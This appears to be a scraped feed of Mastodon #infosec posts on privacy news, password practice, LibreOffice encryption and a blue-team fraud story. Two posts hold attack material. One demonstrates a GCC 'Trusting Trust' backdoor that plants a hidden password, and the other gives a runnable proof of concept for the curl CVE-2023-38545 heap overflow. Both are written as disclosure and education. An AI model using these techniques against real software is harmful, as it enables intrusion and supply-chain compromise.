Mini Blue Team Diaries Story:

Was responsible for SecOps at a SaaS platform that managed lots of things for companies, including travel bookings.

We had a bunch of customers in the higher education space who used SSO to login to our app. Unfortunately, MFA within the SSO configuration was not common back then, so a compromised university account would lead to much access, including to our platform.

Suddenly, a thing we saw a lot of, was higher-ed customers reporting that they were being charged for trips that just didn't make sense. These were bookings for same day travel, usually between two African cities.

After some digging around and investigation, we figured out that a threat actor would phish or purchase the users university credentials, then, using the SSO into our environment, they'd make bookings using the travel booking feature - those bookings were made on behalf of the threat actors customers, who actually thought they were dealing with a legit, well-connected travel agent.

We were able to advise our customers on how to stop this type of thing happening, with approval rules for bookings, and ya know, MFA, and also managed to build in some detective controls so our team could detect and shut down such bookings as soon as they came in.

What made this particularly interesting though, through some OSINT, we were able to determine the true identity of the actor responsible - and we connected with them on Facebook, mainly because we wanted to ask them about their methods now that we'd all but shut down their scheme.

We chatted for a bit, and got some useful intel. At the end, the actor congratulated the team on our new controls, and said they'd moved on to using another service they'd found to make his bookings.

For more, slightly less mini, Blue Team Diaries stories like this, check out infosecdiaries.com

#infosec #DFIR #BlueTeam #infosecreads #cybersecurity

Infosec Diaries

Learn Pen Testing, Blue Teaming and Digital Forensics

^{Infosec Diaries}

What on earth?! Amazon S3 charges you for unauthorised requests to S3?!

That's just absolutely insane! I better check my AWS account and delete any unused buckets I have in there …

medium.com/@maciej.pocwierz/ho…

#aws #s3 #infosec #webdev #cloud

How an empty S3 bucket can make your AWS bill explode

Imagine you create an empty, private AWS S3 bucket in a region of your preference. What will your AWS bill be the next morning?

^{Maciej Pocwierz (Medium)}

I implemented Ken Thompson’s Reflections on Trusting Trust (1984 Turing Award Lecture) compiler #backdoor for the GNU Compiler Collection (GCC). The backdoor maintains persistence by re-injecting itself to any new versions of the compiler built. The secondary payload modifies a test application by adding a backdoor password to allow authentication bypass:

$ cat testapp.c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
if (argc == 2 && !strcmp(argv[1], "secret"))
{
printf("access granted!\n");
return EXIT_SUCCESS;
}
else
{
printf("access denied!\n");
return EXIT_FAILURE;
}
}
$ gcc -Wall -O2 -o testapp.c -o testapp
$ ./testapp kensentme
access granted!
$

I spent most time (around two hours) writing the generalized tooling that produces the final quine version of the malicious payload. Now that this is done, the actual code can be adjusted trivially to exploit more target code without any need to adjust the self-reproducing section of the code. This method of exploitation could be extended to target various binaries: SSH Server, Linux Kernel, Setuid binaries and similar. While itself written in C, the secondary payloads can target any programming languages supported by GCC.

It should be noted that GCC build checks for malicious compiler changes such as this. This check can – of course – also be bypassed. However, most serious projects have measures in place to avoid hacks of this nature.

Some links:
- Ken Thompson's "Reflections on Trusting Trust" paper: cs.cmu.edu/~rdriley/487/papers…
- David A. Wheeler: "Fully Countering Trusting Trust through Diverse Double-Compiling (DDC) - Countering Trojan Horse attacks on Compilers" dwheeler.com/trusting-trust/

#hacking #exploitdevelopment #kenthompson #infosec #cybersecurity @vegard

LibreOffice supports digital signatures via GnuPG for OpenDocument Format (ODF) files.

Select: File > Digital Signatures > Digital Signatures > Sign Document > Select Certificate > Sign > Enter Password > OK > Close

A banner will appear stating the document is digitally signed.

Digital Signature: en.wikipedia.org/wiki/Digital_…
GnuPG: mastodon.online/@blueghost/111…
ODF: mastodon.online/@blueghost/111…

Website: libreoffice.org
Mastodon: @libreoffice

#LibreOffice #DigitalSignature #GnuPG #GPG #InfoSec #ODF

“96% of US Hospital Websites Share Visitor Info With Meta, Google, Data Brokers” yro.slashdot.org/story/24/04/1…

#privacy #infosec #DataBrokers

96% of US Hospital Websites Share Visitor Info With Meta, Google, Data Brokers - Slashdot

An anonymous reader quotes a report from The Guardian: Hospitals -- despite being places where people implicitly expect to have their personal details kept private -- frequently use tracking technologies on their websites to share user information wi…

^{yro.slashdot.org}

This piece is worth reading if you’re in tech criticism or infosec/cybersecurity and are being asked for commentary on IoT and smart home devices.

People aren’t foolish for using IoT or for wanting things to be easier in their homes. This tech makes positive and meaningful change for people of all kinds of abilities. It’s valid to worry about the privacy or security issues that IoT is riddled with, but don’t draw a direct line from there to blaming the user - some people have no alternatives that don’t involve giving up independent access to their own homes and lives. Everyone deserves to live in ways that fit their needs.

Instead, join the push to hold manufacturers and providers to account for poor security and privacy practices. Advocate for better, more respectful and accessible default configurations. Help people understand how to anticipate and mitigate the worst of these issues when they’re setting things up, and give them power and agency over their home systems.

We all deserve to have tech that works for us, in all the ways that matters.

#accessibility
#a11y #infosec
#cybersecurity
#iot #smarthome

theverge.com/24080201/smart-ho…

How smart home technology made my home more accessible

Using one’s phone or voice to flip a light switch may be convenient since you don’t need to get up. For the author and other disabled people, this makes it accessible.

^{Steven Aquino (The Verge)}

🤯 The level of sophistication of the XZ attack is very impressive! I tried to make sense of the analysis in a single page (which was quite complicated)!

I hope it helps to make sense of the information out there. Please treat the information "as is" while the analysis progresses! 🧐 #infosec #xz

Having trouble thinking of password security questions? Try one of these:

#infosec

No more rocket science, I'm moving to Post-Quantum encryption any day now...
tuta.com/blog/post-quantum-cry…

@Tutanota
#infosec #cryptography

Post Quantum Cryptography: Why We Need Resistant Encryption NOW.

Quantum-resistant or post-quantum cryptography is our best bet against attacks from upcoming quantum computers to increase security and privacy.

^Tutanota

"For years, the antivirus software company harvested information from users’ web browsers without their consent." #infosec #privacy

Its clients have included Home Depot, Google, Microsoft, Pepsi, and McKinsey.

theverge.com/2024/2/22/2408013…

Avast fined $16.5 million for ‘privacy’ software that actually sold users’ browsing data

Avast, the cybersecurity software company, is facing a $16.5 million fine from the FTC after its privacy extensions and antivirus software harvested and sold user data.

^{Emma Roth (The Verge)}

im getting really tired... -w-

summary of today:

someone on a Japanese hacker forum decided it was a good idea to spam the entire Fediverse because they wanted to cancel a minor that DDoSed a Discord bot which apparently made them lost millions (what?)

A Discord bot. I can't make this shit up man.

The real culprit seems to be someone who goes by mumei in the ctkpaarr.org forums, whose first post was literally a threat to ap12, that if they don't delete their "Kuroneko Server" Discord bot, they will spam every blog, forum and SNS and cancel him.

This shit is ridiculous.

The ap12 account from mastodon-japan was actually fake, and this dude impersonated a minor to get all of the Fediverse (us) to bully him.

The forum admins didn't even stop this. Why? lulz apparently. #fediblockmeta#fediadmins#fediadmin#mastoadmin#mastoadmins#spam#cybercrime#cybersec#infosec#drama#discord

NEW: WhatsApp will soon make it possible to chat with people who use other messaging apps. It's revealed some more details on how that will work.

— Apps will need to sign an agreement with Meta, then connect to its servers.
— Meta wants people to use the Signal Protocol, but also says other encryption protocols can be used if they can meet WhatsApp's standards
— WhatsApp has been testing with Matrix in recent months, although nothing is agreed yet. Swiss app Threema says it won't become interoperable

wired.com/story/whatsapp-inter… #tech #whatsapp #dma #infosec #news #technology

WhatsApp Chats Will Soon Work With Other Encrypted Messaging Apps

New EU rules mean WhatsApp and Messenger must be interoperable with other chat apps. Here’s how that will work.

^{Matt Burgess (WIRED)}

This screenshot shows the app analytics data sent by two different #iOS apps: Duolingo and Tinder. What's the likelihood that both apps are installed on the same device? 💯? 🤯

Both apps use Unity Ads. The data in the screenshot is collected by the Unity Ads framework included in these two apps, and any app that uses Unity Ads. The data is sent to the same Unity server. As a result, Unity Ads can easily fingerprint users and track them across different apps.

#privacy #tracking #Apple #infosec

Hey #furries there's a bill in Oklahoma that was introduced & would punish children for dressing as a furry at school & have them taken away by Animal Control.

Rep. Humphrey has introduced a heap of shitty bills.😭

Bill Text: webserver1.lsb.state.ok.us/cf_…

Other details: legiscan.com/OK/bill/HB3084/20…

#tech #infosec #nerds #oklahoma #

Getting security online right seems like a daunting task. But one thing is certain: Password managers help! 💪

🔥Here are our top three: tuta.com/blog/best-password-ma… 🔥

What are your favorite #PasswordManagers❓

#privacy #security #opsec #passwords #passwordfatigue #databreach #breachdata #infosec

Why Password Managers Are Important

Password managers are easy tools to increase your privacy and security online. Start using them now!

^Tutanota

• KeePassXC (49%, 218 votes)
• Bitwarden (46%, 201 votes)
• Pass (4%, 18 votes)

📫GREAT Reason To Both Use / Support @thunderbird #Thunderbird

New Microsoft #Outlook Collects / Shares Your Data w/Over 772 Parties

#email #communication #FOSS #Microsoft #Thunderbird #Mozilla #encryption #crypto #e2ee #infosec #Proton #surveillance #cybersecurity #privacy #News

proton.me/blog/outlook-is-micr…

Outlook is Microsoft’s new data collection service

The new Outlook now appears to be a data collection service for Microsoft’s 772 external partners for targeted advertising.

^{Edward Komenda (Proton)}

LibreOffice supports symmetric and asymmetric encryption for OpenDocument Format (ODF) files.

Select File > Save/Save As

The "Save with password" option encrypts the file with AES-256.
The "Encrypt with GPG key" option encrypts the file with a public key.

Symmetric encryption: en.wikipedia.org/wiki/Symmetri…
Asymmetric encryption: en.wikipedia.org/wiki/Public-k…

Website: libreoffice.org
Mastodon: @libreoffice

#LibreOffice #Encryption #OpenSource #OpenPGP #PGP #GnuPG #GPG #InfoSec #Privacy #Security

Fascinating and sophisticated MiTM ('man in the middle') at Hetzner (DE) and Linode, targeting Russia's largest XMPP/Jabber (civilian) chat service. The authors of the article make a reasonably compelling case that "this is lawful interception Hetzner and Linode were forced to setup."

notes.valdikss.org.ru/jabber.r…

Excellent mitigation walkthrough here:

devever.net/~hl/xmpp-incident

Sure gets me thinking.

#infosec #sysadmin #forensics

#LibreOffice posted an article titled "WE WANT TO USE OUR USERS PERSONAL DATA" at design.blog.documentfoundation…

LibreOffice was promoting a data collaboration with a company called polypoly. That article appears to contradict this post.

In the last entry in the comments section of the article the author states the project is on hold.

@libreoffice, what is the status of this project with polypoly? Is it still on hold or has it been cancelled?

#Privacy #InfoSec #TheDocumentFoundation @tdforg

Community support needed: We want to use our users personal data - LibreOffice Design Team

What comes to your mind, when you ask yourself why people use LibreOffice? A “stunning user experience” is likely not in the top list. And unfortunately we share this problem with a lot of user facing Free Software.

^{Heiko Tietze (LibreOffice Design Team)}

Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?

The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.

The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.

Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:

bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:

/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}

But this check is *only* done in INIT state. When the state is anything else, the initial value is used.

Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:

if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.

There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.

#vulnerability #staticanalysis #infosec

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht… for more details.

#infosec

Some exciting news: Over the past few months I have been working on founding a new organization: Blodeuwedd Labs (@blodeuweddlabs)

We are now in a position to offer subsidized security assessments (and other services) for open source projects.

(In addition to a whole array of analysis, development, and custom research offerings for everyone else)

Announcement (and more info): blodeuweddlabs.com/news/open-s…

#infosec #security #appsec #canada #opensource

Launching our Open Source Review Scheme | Blodeuwedd Labs

To celebrate the founding of Blodeuwedd Labs we are excited to announce Subsidized Assessments for open source projects as part of our commitment to continually give back to the open source Community.

^{blodeuweddlabs.com}

If you're using #bitwarden, make sure to change the KDF algorithm to Argon2id[^1] which is much more robust against GPU-powered attacks compared to its counterpart.

You can play around with this little calculator to see the impact of each algorithm on cracking cost estimation: passwordbits.com/passphrase-cr…

[^1]: bitwarden.com/help/what-encryp…

#security #infosec #password

Encryption | Bitwarden Help Center

Learn how Bitwarden salts and hashes password Vault data before sending it to the Cloud for secure storage.

^Bitwarden

BREAKING: #Google to start deleting unused #email accounts so other people can use them.

🤔 What could possibly go wrong?

🤦‍♂️ Techbros are (still) idiots.

#Gmail #privacy #infosec

blog.google/technology/safety-…

Updating our inactive account policies

Starting later this year, we are updating our inactivity policy for Google Accounts to 2 years across our products.

^{Ruth Kricheli (Google)}

This dumb password rule is from MySwissLife.

User ID *has to* be 8 characters exactly, password *has to be* 8 characters and numbers only.

dumbpasswordrules.com/sites/my…

#password #passwords #infosec #cybersecurity #dumbpasswordrules

MySwissLife - Dumb Password Rules

^{dumbpasswordrules.com}

Google has just updated its 2FA Authenticator app and added a much-needed feature: the ability to sync secrets across devices.

TL;DR: Don't turn it on.

The new update allows users to sign in with their Google Account and sync 2FA secrets across their iOS and Android devices.

We analyzed the network traffic when the app syncs the secrets, and it turns out the traffic is not end-to-end encrypted. As shown in the screenshots, this means that Google can see the secrets, likely even while they’re stored on their servers. There is no option to add a passphrase to protect the secrets, to make them accessible only by the user.

Why is this bad?

Every 2FA QR code contains a secret, or a seed, that’s used to generate the one-time codes. If someone else knows the secret, they can generate the same one-time codes and defeat 2FA protections. So, if there’s ever a data breach or if someone obtains access .... 🧵

#Privacy #Cybersecurity #InfoSec #2FA #Google #Security

This dumb password rule is from Banco Mercantil.

8 to 15 chars. No special chars allowed but requires special chars. Also
requires lowercase, uppercase, and numbers. Consecutive chars are
prohibited. Did I mention the page hangs while you type? That eye icon
tho.

dumbpasswordrules.com/sites/ba…

#password #passwords #infosec #cybersecurity #dumbpasswordrules

Banco Mercantil - Dumb Password Rules

8 to 15 chars. No special chars allowed but requires special chars. Also requires lowercase, uppercase, and numbers. Consecutive chars are prohibited. Did I mention the page hangs while you type? That eye icon tho.

^{dumbpasswordrules.com}